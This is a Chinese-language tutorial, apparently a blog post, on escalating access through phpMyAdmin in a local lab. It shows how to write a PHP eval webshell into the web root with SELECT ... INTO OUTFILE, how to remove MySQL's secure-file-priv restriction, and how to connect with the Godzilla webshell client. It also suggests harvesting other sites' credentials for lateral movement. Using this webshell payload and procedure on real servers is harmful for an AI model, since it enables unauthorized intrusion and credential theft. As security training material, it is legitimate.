phpMyAdmin权限提升

免责声明:本文技术仅用于网络安全学习研究,请严格遵守《网络安全法》等相关法律法规,严禁未经授权对任何网络、系统实施攻击或测试,违规操作引发的一切法律责任由使用者自行承担,作者不承担连带责任。

一、环境搭建

小皮下载phpMyAdmin,绑定好网站

网站配置

对应php版本要求5.5以上,需要使用https

下载好高版本php,去网站管理这里设置

选择https,生成开发者测试证书,会自动填充,确认之后等待apache重启

用户名和密码为绑定的网站的(实战中可通过泄露得到)

登陆进去,出现报错:配置文件现在需要一个短语密码。

在下载的phpMyAdmin目录下找到文件"config.sample.inc.php"

将文件复制,重命名为"config.inc.php"

打开找到$cfg'blowfish_secret' = '';这一行,在单引号里填入任意字符串(长一些)

保存文件后刷新页面,报错解决

警告:Undefined index: utf8

还是config.inc.php文件,在数据库配置段添加字符集定义

cfg\['Servers'\]\[i]'charset' = 'utf8';

cfg\['Servers'\]\[i]'collation_connection' = 'utf8_general_ci';

二、实操

SQL命令行写入木马文件

复制代码
SELECT '<?php eval($_POST["pass"]);?>' INTO OUTFILE 'D:\\phpstudy_pro\\WWW\\1.php'

(实战中phpMyAdmin存放目录可尝试通过报错得到,\\双写防止转义)

报错,原因是 secure-file-pive是MySQL 安全限制参数,用于禁止**SELECT ... INTO OUTFILE** 随意写入服务器文件

解决:找到小皮当前使用数据库的my.ini配置文件,在mysqld写入secure-file-priv = "",保存,重启数据库

写入成功

访问1.php文件

哥斯拉连接

连接成功

横向移动的话可以去查找该数据库下其他网站配置文件等,查找源码或登录的账号密码之类的。

相关推荐
笨#小孩13 小时前
文件上传漏洞:原理与20种实战绕过方法(上)
安全·web安全
deepseek2319 小时前
OpenAI 首次为自家模型踩刹车:Astra「无法排除关键网络能力」,Preparedness Framework 第一次真的咬人
人工智能·网络安全·ai agent
AI创界者1 天前
【网络安全运维】Kali Linux 下 Medusa(美杜莎)工具的高效部署、故障排查与安全测试实战
linux·运维·web安全
m0_547486661 天前
《网络协议安全》全套PPT课件(太原理工大学)
网络协议·安全·网络安全
txg6662 天前
VULOC:基于汇编切片的漏洞定位框架,精准锁定二进制中的危险代码
汇编·人工智能·深度学习·安全·网络安全
数据知道2 天前
IDOR 不安全的直接对象引用:API 越权实战检测
java·开发语言·网络·安全·网络安全
云水一下2 天前
零基础玩转bWAPP靶场(四十五):XSS - Reflected (JSON)
web安全·json·xss·bwapp·reflected
能年玲奈喝榴莲牛奶2 天前
使用AI编写-资产和漏洞管理系统
人工智能·python·网络安全·安全服务
祁白_2 天前
WebShell工具流量特征分析
笔记·web安全·流量特征·webshell工具
菩提小狗2 天前
每日安全情报报告 · 2026-08-05
网络安全·漏洞·cve·安全情报·每日安全